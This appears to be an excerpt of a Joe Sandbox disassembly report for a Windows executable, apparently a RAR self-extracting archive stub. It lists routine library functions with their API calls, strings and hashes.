                                        • Opcode ID: 13fbc87a43e79030c3545492e5f248f2f840132991d598d8f357b191238eac86
                                        • Instruction ID: 6c962f1f87634ba14e856bcf78c8f7b8521c42b74edd905baef882f57374ce4a
                                        • Opcode Fuzzy Hash: 13fbc87a43e79030c3545492e5f248f2f840132991d598d8f357b191238eac86
                                        • Instruction Fuzzy Hash: 0B318E726A438656D630EF559C02B7AB3A4EF50360FA0443FF582473C0FAA1ADE087A1
                                        Function 002FC8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 002FC868: _free.LIBCMT ref: 002FC891
                                        • _free.LIBCMT ref: 002FC8F2
                                          • Part of subcall function 002F8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,002FC896,?,00000000,?,00000000,?,002FC8BD,?,00000007,?,?,002FCCBA,?), ref: 002F8DE2
                                          • Part of subcall function 002F8DCC: GetLastError.KERNEL32(?,?,002FC896,?,00000000,?,00000000,?,002FC8BD,?,00000007,?,?,002FCCBA,?,?), ref: 002F8DF4
                                        • _free.LIBCMT ref: 002FC8FD
                                        • _free.LIBCMT ref: 002FC908
                                        • _free.LIBCMT ref: 002FC95C
                                        • _free.LIBCMT ref: 002FC967
                                        • _free.LIBCMT ref: 002FC972
                                        • _free.LIBCMT ref: 002FC97D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                        • Instruction ID: d8710a58ee4484d756dc6a948f3edf4ff91d5f969bbbe05c85b4f8155317bb86
                                        • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                        • Instruction Fuzzy Hash: C61130715A070CA6E621B771CD07FEBFBAC9F01BC0F500C35B39D66092DA65A9299F50
                                        Function 002EE5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,002EE669,002EE5CC,002EE86D), ref: 002EE605
                                        • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 002EE61B
                                        • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 002EE630
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: AddressProc$HandleModule
                                        • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                        • API String ID: 667068680-1718035505
                                        • Opcode ID: 5772c3ea171f8b2e150e443686a843c1051d6a928f6bc19b28b6b5cae30e4e01
                                        • Instruction ID: a9f17aaab07f363056c381ab5d39a81b41621afe496bdc7522f7f97d73ada0af
                                        • Opcode Fuzzy Hash: 5772c3ea171f8b2e150e443686a843c1051d6a928f6bc19b28b6b5cae30e4e01
                                        • Instruction Fuzzy Hash: 52F0F6317F26E35B8F234F675CD45A722DC6A26741B42083ADA06D3150EB50CC745BA0
                                        Function 002F8900 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 002F891E
                                          • Part of subcall function 002F8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,002FC896,?,00000000,?,00000000,?,002FC8BD,?,00000007,?,?,002FCCBA,?), ref: 002F8DE2
                                          • Part of subcall function 002F8DCC: GetLastError.KERNEL32(?,?,002FC896,?,00000000,?,00000000,?,002FC8BD,?,00000007,?,?,002FCCBA,?,?), ref: 002F8DF4
                                        • _free.LIBCMT ref: 002F8930
                                        • _free.LIBCMT ref: 002F8943
                                        • _free.LIBCMT ref: 002F8954
                                        • _free.LIBCMT ref: 002F8965
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID: p0
                                        • API String ID: 776569668-140255176
                                        • Opcode ID: 6ef24ea7fa6dccb00d754f99d8f98634473e212f49caced40a35af96f7360aaa
                                        • Instruction ID: 05f70eb4504a7f522868ecf0ae0211d5fd600f5f9e69638eda7387126c7ed335
                                        • Opcode Fuzzy Hash: 6ef24ea7fa6dccb00d754f99d8f98634473e212f49caced40a35af96f7360aaa
                                        • Instruction Fuzzy Hash: E4F03A7192122A8BC747AF24FC82427FBA9FF25791F000926F714A22B1CBB14961DF81
                                        Function 002E146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 002E14C2
                                          • Part of subcall function 002DB146: GetVersionExW.KERNEL32(?), ref: 002DB16B
                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 002E14E6
                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 002E1500
                                        • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 002E1513
                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 002E1523
                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 002E1533
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: Time$File$System$Local$SpecificVersion
                                        • String ID:
                                        • API String ID: 2092733347-0
                                        • Opcode ID: 068785212860baa4e761a4ced913588d51e90b41daf0b9a6b9a1008509d23e77
                                        • Instruction ID: 029aa09f518786f9e0106a058b1698c4c6b2e41fafe20a48a6aeeed23519c42d
                                        • Opcode Fuzzy Hash: 068785212860baa4e761a4ced913588d51e90b41daf0b9a6b9a1008509d23e77
                                        • Instruction Fuzzy Hash: 52312775118346ABC704DFA9C88499BB7ECBF9C704F404A2EF999C3210E730D518CBA6
                                        Function 002F2AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32(?,?,002F2AF1,002F02FC,002EFA34), ref: 002F2B08
                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 002F2B16
                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 002F2B2F
                                        • SetLastError.KERNEL32(00000000,002F2AF1,002F02FC,002EFA34), ref: 002F2B81
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: ErrorLastValue___vcrt_
                                        • String ID:
                                        • API String ID: 3852720340-0
                                        • Opcode ID: 4fdc4685885ee13b9a2b2fba267dc157a859980fae743b00a2dc1c8dcfeb7bd0
                                        • Instruction ID: 0db971dd5726dc2bf9f2d891e265f5c8f81efdd898e5bec3df5a7399d236d8b7
                                        • Opcode Fuzzy Hash: 4fdc4685885ee13b9a2b2fba267dc157a859980fae743b00a2dc1c8dcfeb7bd0
                                        • Instruction Fuzzy Hash: 3701B53223E31AAEE6151EB4AC55A76AB5DEF02BF8F60063AFB10550E0EE514C245544
                                        Function 002F97E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetLastError.KERNEL32(?,00311030,002F4674,00311030,?,?,002F3F73,00000050,?,00311030,00000200), ref: 002F97E9
                                        • _free.LIBCMT ref: 002F981C
                                        • _free.LIBCMT ref: 002F9844
                                        • SetLastError.KERNEL32(00000000,?,00311030,00000200), ref: 002F9851
                                        • SetLastError.KERNEL32(00000000,?,00311030,00000200), ref: 002F985D
                                        • _abort.LIBCMT ref: 002F9863
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_free$_abort
                                        • String ID:
                                        • API String ID: 3160817290-0
                                        • Opcode ID: f31205b911e308f8204c1287402a165133aef2c3de52d52a966bf09abcbe519f
                                        • Instruction ID: fdf3c68edd1a50a48e85ff39d5ed13c341646d38945cc28d69d5c0092dfc9477
                                        • Opcode Fuzzy Hash: f31205b911e308f8204c1287402a165133aef2c3de52d52a966bf09abcbe519f
                                        • Instruction Fuzzy Hash: FCF0A93616160A66C7133734BC15B7BDA6D8FD2BF1F240135F719D2292EE2088614955
                                        Function 002EDC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WaitForSingleObject.KERNEL32(?,0000000A), ref: 002EDC47
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 002EDC61
                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 002EDC72
                                        • TranslateMessage.USER32(?), ref: 002EDC7C
                                        • DispatchMessageW.USER32(?), ref: 002EDC86
                                        • WaitForSingleObject.KERNEL32(?,0000000A), ref: 002EDC91
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                        • String ID:
                                        • API String ID: 2148572870-0
                                        • Opcode ID: da2fef48ff31ed4c0e98ad7cf8d7614acbd4e9b98fc3fd8d4860911f66851664
                                        • Instruction ID: 57cf4030fdf849153e6bf53d5bf43f645f7ce8759beebc84090ff5e8816e19fc
                                        • Opcode Fuzzy Hash: da2fef48ff31ed4c0e98ad7cf8d7614acbd4e9b98fc3fd8d4860911f66851664
                                        • Instruction Fuzzy Hash: AAF03C72A42219BBCB216BA5DC8CEDB7F6DEF41791F108012B50AD2060D675D646C7A0
                                        Function 002EA80C Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 237COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 002EA699: GetDC.USER32(00000000), ref: 002EA69D
                                          • Part of subcall function 002EA699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 002EA6A8
                                          • Part of subcall function 002EA699: ReleaseDC.USER32(00000000,00000000), ref: 002EA6B3
                                        • GetObjectW.GDI32(?,00000018,?), ref: 002EA83C
                                          • Part of subcall function 002EAAC9: GetDC.USER32(00000000), ref: 002EAAD2
                                          • Part of subcall function 002EAAC9: GetObjectW.GDI32(?,00000018,?), ref: 002EAB01
                                          • Part of subcall function 002EAAC9: ReleaseDC.USER32(00000000,?), ref: 002EAB99
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: ObjectRelease$CapsDevice
                                        • String ID: ".$($A.
                                        • API String ID: 1061551593-2927423407
                                        • Opcode ID: bcec2cdb92c41cb95769abe8a9b5036e28d7a938dfda1fbc3ed168cc14c11d37
                                        • Instruction ID: 939ae74901cd32d7bcc77dfeb9669d01cdd451ee344268ce80d13fc9f3d2fd0e
                                        • Opcode Fuzzy Hash: bcec2cdb92c41cb95769abe8a9b5036e28d7a938dfda1fbc3ed168cc14c11d37
                                        • Instruction Fuzzy Hash: 2B91DF71618395AFD611DF25C898A2BBBFCFF89700F00491EF59AD3260DB70A945CB62
                                        Function 002DC0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 002E05DA: _wcslen.LIBCMT ref: 002E05E0
                                          • Part of subcall function 002DB92D: _wcsrchr.LIBVCRUNTIME ref: 002DB944
                                        • _wcslen.LIBCMT ref: 002DC197
                                        • _wcslen.LIBCMT ref: 002DC1DF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: _wcslen$_wcsrchr
                                        • String ID: .exe$.rar$.sfx
                                        • API String ID: 3513545583-31770016
                                        • Opcode ID: a3ed3a46d14c525c66514dfebb7853f628183468ec5460bc76741ad0ea2d5c9d
                                        • Instruction ID: 9cd920b08bde72a05992e47946ae713dd6d84088c1fcffbf90fca3e0ea488358
                                        • Opcode Fuzzy Hash: a3ed3a46d14c525c66514dfebb7853f628183468ec5460bc76741ad0ea2d5c9d
                                        • Instruction Fuzzy Hash: 0A41282257036395C732AF748856A7AB3A8EF41744F34450FF9C5AB2C1EBA09DB2C791
                                        Function 002DBB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON
                                        Download Yara Rule
                                        APIs
                                        • _wcslen.LIBCMT ref: 002DBB27
                                        • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,002DA275,?,?,00000800,?,002DA23A,?,002D755C), ref: 002DBBC5
                                        • _wcslen.LIBCMT ref: 002DBC3B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: _wcslen$CurrentDirectory
                                        • String ID: UNC$\\?\
                                        • API String ID: 3341907918-253988292
                                        • Opcode ID: b065e73c6012fc9f86b41d4ccedec50f166ea19457667ac1ecd10f33c746a309
                                        • Instruction ID: e4f248ce578148d21b83b3381ca86f5bfe207fb26caa231432f9e8306e38e2e4
                                        • Opcode Fuzzy Hash: b065e73c6012fc9f86b41d4ccedec50f166ea19457667ac1ecd10f33c746a309
                                        • Instruction Fuzzy Hash: 4F41AF35470256EACF22AF21CC61EEA77ADBF45790F514427F814A3251EBB09EB18F60
                                        Function 002ECD58 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 103COMMON
                                        Download Yara Rule
                                        APIs
                                        • _wcschr.LIBVCRUNTIME ref: 002ECD84
                                          • Part of subcall function 002EAF98: _wcschr.LIBVCRUNTIME ref: 002EB033
                                          • Part of subcall function 002E1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,002DC116,00000000,.exe,?,?,00000800,?,?,?,002E8E3C), ref: 002E1FD1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: _wcschr$CompareString
                                        • String ID: <$HIDE$MAX$MIN
                                        • API String ID: 69343711-3358265660
                                        • Opcode ID: c86ee81d552c8e97e68d80a033a931fbbd952721cbb04dee0bf1a2f43e1a32ce
                                        • Instruction ID: ee6da26a7ba8795756fbc67d575bc7975f407d97e0fd5b57128fcd8849412f60
                                        • Opcode Fuzzy Hash: c86ee81d552c8e97e68d80a033a931fbbd952721cbb04dee0bf1a2f43e1a32ce
                                        • Instruction Fuzzy Hash: 5531957199034A9ADF25CF92CC41EEE73BCAB15350F9041A6F905E7180EBB09E948FA0
                                        Function 002EAAC9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDC.USER32(00000000), ref: 002EAAD2
                                        • GetObjectW.GDI32(?,00000018,?), ref: 002EAB01
                                        • ReleaseDC.USER32(00000000,?), ref: 002EAB99
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: ObjectRelease
                                        • String ID: -.$7.
                                        • API String ID: 1429681911-3881156084
                                        • Opcode ID: db61c555a6655b61f0ff3dc14402a9e367ae381e51480b1dbddb7e3a81a57646
                                        • Instruction ID: 0dc913f0c0f8aa4779141c419b615f6e1948d1c72d9fbf5216b94d0161e8c5a5
                                        • Opcode Fuzzy Hash: db61c555a6655b61f0ff3dc14402a9e367ae381e51480b1dbddb7e3a81a57646
                                        • Instruction Fuzzy Hash: C8212AB2148304AFD3069FA5DD88E6FBFEDFF89351F044819FA4692120D7359A548B62
                                        Function 002DB991 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                                        Download Yara Rule
                                        APIs
                                        • _swprintf.LIBCMT ref: 002DB9B8
                                          • Part of subcall function 002D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002D40A5
                                        • _wcschr.LIBVCRUNTIME ref: 002DB9D6
                                        • _wcschr.LIBVCRUNTIME ref: 002DB9E6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: _wcschr$__vswprintf_c_l_swprintf
                                        • String ID: %c:\
                                        • API String ID: 525462905-3142399695
                                        • Opcode ID: 44755b356cc68abf6f9f6561ac7a47c2a5078f573a7bd3f8ea2dc808dd054602
                                        • Instruction ID: 2f351c4064e05cdbbcd30a52f01b492d94761a4d05a850ddd98c413c4bf67be2
                                        • Opcode Fuzzy Hash: 44755b356cc68abf6f9f6561ac7a47c2a5078f573a7bd3f8ea2dc808dd054602
                                        • Instruction Fuzzy Hash: 69014923530312E9DA326F358C55D7BE39CEF953B0B41441BF544D6282EB20DC3486B1
                                        Function 002EB270 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 002D1316: GetDlgItem.USER32(00000000,00003021), ref: 002D135A
                                          • Part of subcall function 002D1316: SetWindowTextW.USER32(00000000,003035F4), ref: 002D1370
                                        • EndDialog.USER32(?,00000001), ref: 002EB2BE
                                        • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 002EB2D6
                                        • SetDlgItemTextW.USER32(?,00000067,?), ref: 002EB304
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1654775457.00000000002D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                        • Associated: 00000000.00000002.1654754381.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654806215.0000000000303000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000315000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654823376.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1654880998.0000000000333000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2d0000_7vP2IvNXqx.jbxd
                                        Similarity
                                        • API ID: ItemText$DialogWindow
                                        • String ID: GETPASSWORD1$xz2
                                        • API String ID: 445417207-3677196923
                                        • Opcode ID: 4bbf620935c8323624e3f4b5eda7c94877838239e4b76ae6daabfc44ccb74ebd
                                        • Instruction ID: 07c4c1738ba31d488f02d30483d188d825d0da67814e362ecbe2ad9086a91fd3
                                        • Opcode Fuzzy Hash: 4bbf620935c8323624e3f4b5eda7c94877838239e4b76ae6daabfc44ccb74ebd
                                        • Instruction Fuzzy Hash: 5411C2329A015576DB139E759D8AFFF376CAF09700F400061FB46B21C0C7A099608AA1
